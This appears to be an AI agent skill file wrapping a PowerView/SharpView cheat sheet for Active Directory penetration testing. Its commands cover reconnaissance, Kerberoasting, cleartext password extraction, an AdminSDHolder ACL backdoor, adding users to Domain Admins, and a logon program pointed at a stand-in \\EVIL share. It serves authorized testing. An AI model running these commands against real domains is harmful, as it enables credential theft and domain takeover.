Hacktricks-skills ad-enumeration-powerview

Active Directory enumeration using PowerView/SharpView. Use this skill whenever the user mentions Active Directory enumeration, AD reconnaissance, PowerView, SharpView, domain security assessment, AD pentesting, finding misconfigurations in AD, Kerberoast, ASREPRoast, or any AD-related security testing. Make sure to use this skill for any AD enumeration task, even if the user doesn't explicitly mention PowerView.

install

source · Clone the upstream repo

git clone https://github.com/abelrguezr/hacktricks-skills

manifest: skills/windows-hardening/basic-powershell-for-pentesters/powerview/SKILL.MD

source content

Active Directory Enumeration with PowerView/SharpView

A comprehensive guide for enumerating Active Directory environments using PowerView and SharpView tools.

Quick Reference

Domain Information

Get-NetDomain                    # Basic domain info
Get-DomainSID                    # Get domain SID
Get-DomainController             # Domain controller details
Get-ForestDomain                 # All domains in forest
Get-DomainPolicy                 # Domain policy info

User Enumeration

Get-NetUser                      # List all users
Get-NetUser -PreauthNotRequired  # ASREPRoastable users
Get-NetUser -SPN                 # Kerberoastable users
Get-NetUser -UACFilter NOT_ACCOUNTDISABLE  # Enabled users
Get-NetUser -LDAPFilter '(sidHistory=*)'   # Users with sidHistory

Group Enumeration

Get-NetGroup                     # List all groups
Get-NetGroup -AdminCount         # Admin groups
Get-NetGroupMember -Identity "Domain Admins" -Recurse  # Group members

Computer Enumeration

Get-NetComputer                  # List all computers
Get-NetComputer -Unconstrained   # Unconstrained delegation
Get-NetComputer -TrustedToAuth   # Constrained delegation

ACL Analysis

Get-ObjectAcl -SamAccountName <user> -ResolveGUIDs  # Object ACLs
Find-InterestingDomainAcl -ResolveGUIDs              # Interesting ACEs

GPO Analysis

Get-DomainGPO                    # List all GPOs
Get-DomainGPOLocalGroup          # GPO local group mappings
Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators  # Who's in local admins

Low-Hanging Fruit

Find-LocalAdminAccess            # Find local admin access
Invoke-UserHunter                # Find user locations
Find-DomainUserLocation          # User location finder
Invoke-Kerberoast                # Kerberoast attack

Detailed Enumeration

Domain Information

# Domain Info
Get-Domain                        # Get info about the current domain
Get-NetDomain                     # Get info about the current domain
Get-NetDomain -Domain mydomain.local  # Specific domain
Get-DomainSID                     # Get domain SID

# Policy
Get-DomainPolicy                  # Get info about the policy
(Get-DomainPolicy)."KerberosPolicy"  # Kerberos tickets info
(Get-DomainPolicy)."SystemAccess"    # Password policy
Get-DomainPolicyData              # Same as Get-DomainPolicy

# Domain Controller
Get-DomainController | select Forest, Domain, IPAddress, Name, OSVersion | fl
Get-NetDomainController -Domain mydomain.local

# Forest Info
Get-ForestDomain                  # Get all domains in forest
Get-ForestGlobalCatalog           # Get forest global catalog info

Users

# Basic User Info
Get-DomainUser -Properties name, MemberOf | fl
Get-NetUser | select samaccountname, description, pwdlastset, logoncount, badpwdcount
Get-NetUser -UserName student107  # Specific user
Get-NetUser -properties name, description  # Specific properties

# Search Users
Find-UserField -SearchField Description -SearchTerm "built"  # Search in fields

# Security-Relevant Users
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'}  # Reversible encryption
Get-NetUser -PreauthNotRequired  # ASREPRoastable users
Get-NetUser -SPN | select serviceprincipalname  # Kerberoastable users
Get-NetUser -SPN | ?{$_.memberof -match 'Domain Admins'}  # Domain admins kerberoastable
Get-NetUser -TrustedToAuth | select userprincipalname, name, msds-allowedtodelegateto  # Constrained delegation
Get-NetUser -AllowDelegation -AdminCount  # Privileged users allowing delegation

# DC Sync Capable Users
Get-ObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
    ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
}

# Password Not Required
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

# User Filters
Get-NetUser -UACFilter NOT_ACCOUNTDISABLE -properties distinguishedname  # All enabled users
Get-NetUser -UACFilter ACCOUNTDISABLE  # All disabled users
Get-NetUser -UACFilter SMARTCARD_REQUIRED  # Smart card required
Get-NetUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname  # Not smart card
Get-NetUser -LDAPFilter '(sidHistory=*)'  # Users with sidHistory

Groups

# Basic Group Info
Get-DomainGroup | where Name -like "*Admin*" | select SamAccountName
Get-NetGroup  # Get all groups
Get-NetGroup -Domain mydomain.local  # Specific domain
Get-NetGroup 'Domain Admins'  # Specific group
Get-NetGroup -AdminCount | select name,memberof,admincount,member | fl  # Admin groups
Get-NetGroup -UserName "myusername"  # Groups of a user

# Group Members
Get-NetGroupMember -Identity "Administrators" -Recurse  # Recursive members
Get-NetGroupMember -Identity "Enterprise Admins" -Domain mydomain.local
Get-NetLocalGroup -ComputerName dc.mydomain.local -ListGroups  # Local groups
Get-NetLocalGroupMember -computername dcorp-dc.dollarcorp.moneycorp.local

# AdminSDHolder
Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}

# GPO Groups
Get-NetGPOGroup  # Get restricted groups

Computers

# Basic Computer Info
Get-DomainComputer -Properties DnsHostName  # All domain computers
Get-NetComputer  # All computer objects
Get-NetComputer -Ping  # Ping to check if online

# Delegation
Get-NetComputer -Unconstrained  # Unconstrained delegation
Get-NetComputer -TrustedToAuth  # Constrained delegation

# Privileged Machine Accounts
Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'}

Organization Units

Get-DomainOU -Properties Name | sort -Property Name  # All OUs
Get-DomainOU "Servers" | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties Name}
Get-NetOU  # Get Organization Units
Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_}

Logon and Sessions

Get-NetLoggedon -ComputerName <servername>  # Current logon users (needs admin)
Get-NetSession -ComputerName <servername>  # Active sessions
Get-LoggedOnLocal -ComputerName <servername>  # Local logon users (needs remote registry)
Get-LastLoggedon -ComputerName <servername>  # Last logged on user (needs admin)
Get-NetRDPSession -ComputerName <servername>  # RDP sessions (needs admin)

Group Policy Objects (GPOs)

# Basic GPO Info
Get-DomainGPO | select displayName  # GPO names
Get-NetGPO  # All policies with details
Get-NetGPO -ComputerName <servername>  # Policy on specific computer

# GPO Permissions
Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=dev,DC=invented,DC=io" -ResolveGUIDs | 
  ? { $_.ObjectAceType -eq "Group-Policy-Container" } | 
  select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl

# Users with GPO modification rights (RID > 1000)
Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? {
    ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and 
    ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')
} | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl

# User/Group GPO permissions
$sid=Convert-NameToSid "Domain Users"
Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}

# GPO Utilities
Get-GPO -Guid 18E5A689-E67F-90B2-1953-198ED4A7F532  # GUID to name
ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1126  # SID to name
Get-NetGPO -GPOName '{3E04167E-C2B6-4A9A-8FB7-C811158DC97C}'  # GPO by GUID

# Local Group Mappings
Get-DomainGPOLocalGroup | select GPODisplayName, GroupName, GPOType
Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | 
  select ObjectName, GPODisplayName, ContainerName, ComputerName

ACL Analysis

# Object ACLs
Get-ObjectAcl -SamAccountName <username> -ResolveGUIDs

# Alternative ACL method
$sid = Convert-NameToSid <username/group>
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}

# File ACLs
Get-PathAcl -Path "\\dc.mydomain.local\sysvol"

# Interesting ACEs
Find-InterestingDomainAcl -ResolveGUIDs  # Unexpected permissions
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match "RDPUsers"}

# Administrator ACLs
Get-NetGroupMember -GroupName "Administrators" -Recurse | 
  ?{$_.IsGroup -match "false"} | 
  %{Get-ObjectACL -SamAccountName $_.MemberName -ResolveGUIDs} | 
  select ObjectDN, IdentityReference, ActiveDirectoryRights

Shared Files and Folders

Get-NetFileServer  # Search file servers
Find-DomainShare -CheckShareAccess  # Search readable shares
Find-InterestingDomainShareFile  # Find interesting files

Domain Trusts

Get-NetDomainTrust  # All domain trusts
Get-DomainTrust  # Same
Get-NetForestDomain | Get-NetDomainTrust  # All trusts in forest
Get-DomainTrustMapping  # Enumerate trusts

# Forest Info
Get-ForestDomain  # Basic forest info
Get-ForestGlobalCatalog  # Current forest
Get-ForestGlobalCatalog -Forest external.domain  # External forest
Get-DomainTrust -SearchBase "GC://$($ENV:USERDNSDOMAIN)"

# Forest Trusts
Get-NetForestTrust  # Forest trusts (root to root)

# Foreign Objects
Get-DomainForeingUser  # Users with privileges in other domains
Get-DomainForeignGroupMember  # Groups with privileges in other domains

Low-Hanging Fruit

# Clear Text Passwords
$FormatEnumerationLimit=-1
Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | 
  % {Add-Member -InputObject $_ NoteProperty 'Password' 
    "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl

# Local Admin Access
Find-LocalAdminAccess  # Very noisy, needs RPC and SMB

# WMI Local Admin Access
.\Find-WMILocalAdminAccess.ps1 -ComputerFile .\computers.txt  # If RPC/SMB closed

# GPO Local Admin Mapping
Get-DomainGPOUserLocalGroupMapping -Identity <User/Group>

# Local Admin Enumeration
Invoke-EnumerateLocalAdmin  # Enumerate local admin members
Find-DomainLocalGroupMember

# Unconstrained Delegation
Find-DomainUserLocation -ComputerUnconstrained -ShowAll
Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation

# User Hunter
Find-DomainUserLocation [-CheckAccess] | select UserName, SessionFromName
Invoke-UserHunter [-CheckAccess]  # Find user locations
Invoke-UserHunter -GroupName "RDPUsers"  # Specific group
Invoke-UserHunter -Stealth  # High traffic servers only

Deleted Objects

# Requires AD Recycle Bin group membership
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *

Utilities

SID to Name

"S-1-5-21-1874506631-3219952063-538504511-2136" | Convert-SidToName

Kerberoast

Invoke-Kerberoast [-Identity websvc]  # Without -Identity, kerberoast all possible users

Use Different Credentials

$SecPassword = ConvertTo-SecureString 'Password' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\user', $SecPassword)
Get-DomainUser -Credential $Cred

Impersonate a User

# Requires -sta mode
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Invoke-UserImpersonation -Credential $Cred
# ... perform actions ...
Invoke-RevertToSelf

Set Values

# Set user property
Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose

# Set object owner
Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y

# Backdoor ACLs through AdminSDHolder
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' 
  -PrincipalIdentity matt -Rights All

# Add user to group
Add-NetGroupUser -Username username -GroupName 'Domain Admins' -Domain my.domain.local

Common Attack Vectors

ASREPRoast

Users with pre-authentication not required can have their passwords cracked offline.

Get-NetUser -PreauthNotRequired

Kerberoast

Users with SPNs can have their TGS tickets requested and cracked.

Get-NetUser -SPN
Invoke-Kerberoast

Unconstrained Delegation

Computers with unconstrained delegation can capture admin credentials.

Get-NetComputer -Unconstrained
Find-DomainUserLocation -ComputerUnconstrained -ShowAll

ACL Abuse

Interesting ACLs can lead to privilege escalation.

Find-InterestingDomainAcl -ResolveGUIDs

GPO Abuse

GPO permissions can be abused for persistence and privilege escalation.

Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators

Safety Notes

Authorization Required: Only use these tools on systems you own or have explicit permission to test.
Noisy Operations: Commands like
```
Find-LocalAdminAccess
```
are very noisy and will trigger alerts.
Privilege Requirements: Many commands require domain user or admin privileges.
Legal Compliance: Ensure compliance with all applicable laws and regulations.

Resources

PowerView: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
SharpView: https://github.com/tevora-threat/SharpView